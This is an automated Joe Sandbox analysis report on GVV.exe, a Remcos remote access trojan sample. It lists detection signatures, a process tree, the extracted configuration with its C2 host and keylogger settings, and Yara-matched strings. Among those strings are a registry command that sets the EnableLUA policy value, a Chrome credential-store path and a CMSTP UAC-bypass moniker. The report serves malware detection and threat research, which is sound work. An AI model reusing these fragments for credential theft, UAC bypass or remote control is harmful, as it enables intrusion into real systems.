Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GVV.exe

Overview

General Information

Sample name:GVV.exe
Analysis ID:1435345
MD5:fa3641c75d2beb68c01e8065eefc4707
SHA1:1a2f7c3bb7190f8d8e1685e4e1fd77ebecc699ba
SHA256:e28c8fc4052dbd472cc6245f605064f85ebb36371b43246066fdbeca547cbd17
Tags:exe
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
System process connects to network (likely due to code injection or exploit)
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • GVV.exe (PID: 3384 cmdline: "C:\Users\user\Desktop\GVV.exe" MD5: FA3641C75D2BEB68C01E8065EEFC4707)
    • deblaterate.exe (PID: 5276 cmdline: "C:\Users\user\Desktop\GVV.exe" MD5: 67B3857DEE4F4219F088B87902BFF4B0)
      • svchost.exe (PID: 2248 cmdline: "C:\Users\user\Desktop\GVV.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • WerFault.exe (PID: 3544 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 1456 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • WerFault.exe (PID: 352 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 1456 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 6336 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • deblaterate.exe (PID: 1136 cmdline: "C:\Users\user\AppData\Local\silvexes\deblaterate.exe" MD5: 67B3857DEE4F4219F088B87902BFF4B0)
      • svchost.exe (PID: 592 cmdline: "C:\Users\user\AppData\Local\silvexes\deblaterate.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Version": "4.9.4 Pro", "Host:Port:Password": "yuahdgbceja.sytes.net:2766:1", "Assigned name": "Grace-Host2024", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "hua.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-E70NOS", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
      • 0x6aaa8:$a1: Remcos restarted by watchdog!
      • 0x6b020:$a3: %02i:%02i:%02i:%03i
      00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
      • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
      • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x64b6c:$str_b2: Executing file:
      • 0x65bec:$str_b3: GetDirectListeningPort
      • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x65718:$str_b7: \update.vbs
      • 0x64b94:$str_b9: Downloaded file:
      • 0x64b80:$str_b10: Downloading file:
      • 0x64c24:$str_b12: Failed to upload file:
      • 0x65bb4:$str_b13: StartForward
      • 0x65bd4:$str_b14: StopForward
      • 0x65670:$str_b15: fso.DeleteFile "
      • 0x65604:$str_b16: On Error Resume Next
      • 0x656a0:$str_b17: fso.DeleteFolder "
      • 0x64c14:$str_b18: Uploaded file:
      • 0x64bd4:$str_b19: Unable to delete:
      • 0x65638:$str_b20: while fso.FileExists("
      • 0x650b1:$str_c0: [Firefox StoredLogins not found]
      00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
      • 0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x6497c:$s1: CoGetObject
      • 0x64990:$s1: CoGetObject
      • 0x649ac:$s1: CoGetObject
      • 0x6e938:$s1: CoGetObject
      • 0x6493c:$s2: Elevation:Administrator!new:
      Click to see the 27 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.deblaterate.exe.4000000.1.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
        4.2.deblaterate.exe.4000000.1.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          4.2.deblaterate.exe.4000000.1.unpackWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x690a8:$a1: Remcos restarted by watchdog!
          • 0x69620:$a3: %02i:%02i:%02i:%03i
          4.2.deblaterate.exe.4000000.1.unpackREMCOS_RAT_variantsunknownunknown
          • 0x630fc:$str_a1: C:\Windows\System32\cmd.exe
          • 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x6316c:$str_b2: Executing file:
          • 0x641ec:$str_b3: GetDirectListeningPort
          • 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x63d18:$str_b7: \update.vbs
          • 0x63194:$str_b9: Downloaded file:
          • 0x63180:$str_b10: Downloading file:
          • 0x63224:$str_b12: Failed to upload file:
          • 0x641b4:$str_b13: StartForward
          • 0x641d4:$str_b14: StopForward
          • 0x63c70:$str_b15: fso.DeleteFile "
          • 0x63c04:$str_b16: On Error Resume Next
          • 0x63ca0:$str_b17: fso.DeleteFolder "
          • 0x63214:$str_b18: Uploaded file:
          • 0x631d4:$str_b19: Unable to delete:
          • 0x63c38:$str_b20: while fso.FileExists("
          • 0x636b1:$str_c0: [Firefox StoredLogins not found]
          4.2.deblaterate.exe.4000000.1.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
          • 0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
          • 0x62f7c:$s1: CoGetObject
          • 0x62f90:$s1: CoGetObject
          • 0x62fac:$s1: CoGetObject
          • 0x6cf38:$s1: CoGetObject
          • 0x62f3c:$s2: Elevation:Administrator!new:
          Click to see the 35 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , ProcessId: 6336, ProcessName: wscript.exe
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\GVV.exe", CommandLine: "C:\Users\user\Desktop\GVV.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\GVV.exe", ParentImage: C:\Users\user\AppData\Local\silvexes\deblaterate.exe, ParentProcessId: 5276, ParentProcessName: deblaterate.exe, ProcessCommandLine: "C:\Users\user\Desktop\GVV.exe", ProcessId: 2248, ProcessName: svchost.exe
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , ProcessId: 6336, ProcessName: wscript.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\GVV.exe", CommandLine: "C:\Users\user\Desktop\GVV.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\GVV.exe", ParentImage: C:\Users\user\AppData\Local\silvexes\deblaterate.exe, ParentProcessId: 5276, ParentProcessName: deblaterate.exe, ProcessCommandLine: "C:\Users\user\Desktop\GVV.exe", ProcessId: 2248, ProcessName: svchost.exe

          Data Obfuscation

          barindex
          Sigma detected: Drops script at startup location
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\silvexes\deblaterate.exe, ProcessId: 5276, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs

          Stealing of Sensitive Information

          barindex
          Sigma detected: Remcos
          Source: Registry Key setAuthor: Joe Security: Data: Details: FD 44 4B 36 AE 9C E0 16 26 19 F5 A2 D6 C2 5C 1C 3F 2E 1E 22 74 EF 03 FE 4E CA 0A C8 28 C8 02 76 CE D4 34 45 AE BE CC E8 6F 0D CB 89 C3 D6 7F 35 0B 71 0A 11 71 35 61 80 1D 1C F9 6D 0A C2 5C 62 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2248, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-E70NOS\exepath

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
          Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
          Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
          Found malware configuration
          Source: 14.2.deblaterate.exe.3e00000.1.raw.unpackMalware Configuration Extractor: Remcos {"Version": "4.9.4 Pro", "Host:Port:Password": "yuahdgbceja.sytes.net:2766:1", "Assigned name": "Grace-Host2024", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "hua.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-E70NOS", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
          Multi AV Scanner detection for submitted file
          Source: GVV.exeReversingLabs: Detection: 34%
          Source: GVV.exeVirustotal: Detection: 30%Perma Link
          Yara detected Remcos RAT
          Source: Yara matchFile source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: deblaterate.exe PID: 5276, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2248, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: deblaterate.exe PID: 1136, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 592, type: MEMORYSTR
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: GVV.exeJoe Sandbox ML: detected
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,5_2_00433837
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,15_2_00433837
          Source: deblaterate.exe, 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_9a170fd7-7

          Exploits

          barindex
          Yara detected UAC Bypass using CMSTP
          Source: Yara matchFile source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: deblaterate.exe PID: 5276, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2248, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: deblaterate.exe PID: 1136, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 592, type: MEMORYSTR

          Privilege Escalation

          barindex
          Contains functionality to bypass UAC (CMSTPLUA)
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004074FD _wcslen,CoGetObject,5_2_004074FD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_004074FD _wcslen,CoGetObject,15_2_004074FD
          Source: GVV.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: wntdll.pdbUGP source: deblaterate.exe, 00000004.00000003.3898366158.0000000004080000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000004.00000003.3899574289.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.4090794343.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.4090920918.00000000040B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: deblaterate.exe, 00000004.00000003.3898366158.0000000004080000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000004.00000003.3899574289.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.4090794343.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.4090920918.00000000040B0000.00000004.00001000.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0017DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0017DBBE
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0014C2A2 FindFirstFileExW,0_2_0014C2A2
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001868EE FindFirstFileW,FindClose,0_2_001868EE
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0018698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0018698F
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0017D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0017D076
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0017D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0017D3A9
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00189642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00189642
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0018979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0018979D
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00189B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00189B2B
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_00185C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00185C97
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004DDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,4_2_004DDBBE
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004AC2A2 FindFirstFileExW,4_2_004AC2A2
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004E68EE FindFirstFileW,FindClose,4_2_004E68EE
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004E698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,4_2_004E698F
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004DD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_004DD076
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004DD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_004DD3A9
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004E9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_004E9642
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004E979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_004E979D
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004E9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,4_2_004E9B2B
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004E5C97 FindFirstFileW,FindNextFileW,FindClose,4_2_004E5C97
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_00409253
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_0041C291
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_0040C34D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_00409665
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0044E879 FindFirstFileExA,5_2_0044E879
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_0040880C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040783C FindFirstFileW,FindNextFileW,5_2_0040783C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_00419AF5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0040BB30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0040BD37
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_00409253
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_0041C291
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_0040C34D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_00409665
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0044E879 FindFirstFileExA,15_2_0044E879
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_0040880C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0040783C FindFirstFileW,FindNextFileW,15_2_0040783C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00419AF5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040BB30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040BD37
